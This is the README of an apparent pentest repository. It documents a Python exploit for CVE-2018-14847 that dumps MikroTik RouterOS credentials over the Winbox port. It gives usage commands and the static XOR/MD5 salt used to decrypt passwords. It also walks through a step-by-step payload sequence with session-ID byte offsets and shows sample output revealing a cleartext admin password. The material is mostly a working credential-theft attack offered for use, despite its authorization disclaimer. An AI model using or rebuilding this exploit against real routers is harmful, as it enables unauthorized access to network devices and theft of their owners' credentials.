
VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON
Dépôt de scripts pour l'audit et les tests d'intrusion réseau.
Utilisez uniquement sur des appareils avec autorisation formelle.
Exploite la vulnérabilité de lecture de fichier non authentifiée dans le service Winbox de MikroTik RouterOS. Le gestionnaire de fichiers (gestionnaire ID 2) ne valide pas l'authentification, permettant à un attaquant externe de lire le fichier user.dat qui contient tous les utilisateurs et mots de passe de l'appareil.
Les mots de passe sont stockés chiffrés avec XOR en utilisant la clé MD5(usuario + "283i4jfkai3389"). Le script effectue le déchiffrement automatiquement.
| Branche | Vulnerable jusqu'à | Version corrigée |
|---|---|---|
| Stable | 6.42 | 6.42.1 |
| Long-term | 6.40.7 | 6.40.8 |
| RC | 6.42 | 6.43 |
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291
# Cible par défaut sur le port 8291
python3 cve_2018_14847.py 192.168.1.1
# Port personnalisé
python3 cve_2018_14847.py 192.168.1.1 --port 8291
1. Se connecte au port 8291 (Winbox)
↓
2. Envoie FIRST_PAYLOAD — ouvre session + demande /flash/rw/store/user.dat
↓
3. Extrait l'ID de session du byte 38 de la réponse
↓
4. Injecte l'ID de session dans le byte 19 du SECOND_PAYLOAD
↓
5. Envoie SECOND_PAYLOAD — lit le fichier user.dat
↓
6. Analyse les entrées M2 → extrait l'utilisateur et le mot de passe chiffré
↓
7. Déchiffre le mot de passe : XOR avec MD5(usuario + salt)
↓
8. Affiche les identifiants et sauvegarde dans un fichier
═══════════════════════════════════════════════════════
CVE-2018-14847 — Vidage d'identifiants Winbox MikroTik
Lecture de fichier non authentifiée + Déchiffrement de mot de passe
Affecté : RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
Cible : 192.168.1.1:8291
Date : 2026-05-20 18:06:58
[*] Connexion à 192.168.1.1:8291 ...
[+] Connecté au service Winbox.
[*] Envoi du payload 1 (demande de fichier) ...
[+] Réponse reçue (84 octets). ID de session : 0x35
[*] Envoi du payload 2 (lecture du user.dat) ...
[+] Données reçues (312 octets).
[*] Analyse du user.dat (257 octets utiles) ...
═══════════════════════════════════════════════════════
IDENTIFIANTS EXTRAITS
═══════════════════════════════════════════════════════
Utilisateur : admin
Mot de passe : senha123
Combo : admin:senha123
───────────────────────────────────────────────────────
[+] 1 identifiant(s) trouvé(s).
[+] Résultat sauvegardé dans : mikrotik_1192.168.1.1_20260520_180658.txt
Le résultat est sauvegardé automatiquement dans :
mikrotik_<IP>_<TIMESTAMP>.txt
Exemple : mikrotik_192.168.1.1_20260520_180658.txt
Contient : IP de la cible, date, CVE, version affectée et toutes les paires utilisateur:mot de passe.
/rede/
├── README.md # ce fichier
├── cve_2018_14847.py # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md # rapport de pentest CGNAT
├── pentest_roteador_192.168.2.1.md # rapport de pentest routeur
└── mikrotik_<IP>_<TIMESTAMP>.txt # résultats générés par le script
AVIS JURIDIQUE : Ces outils sont destinés à une utilisation exclusive dans des environnements autorisés. L'exécution non autorisée contre des systèmes tiers est un crime prévu par la loi 12.737/2012 (Loi Carolina Dieckmann) et par l'Art. 154-A du Code pénal brésilien.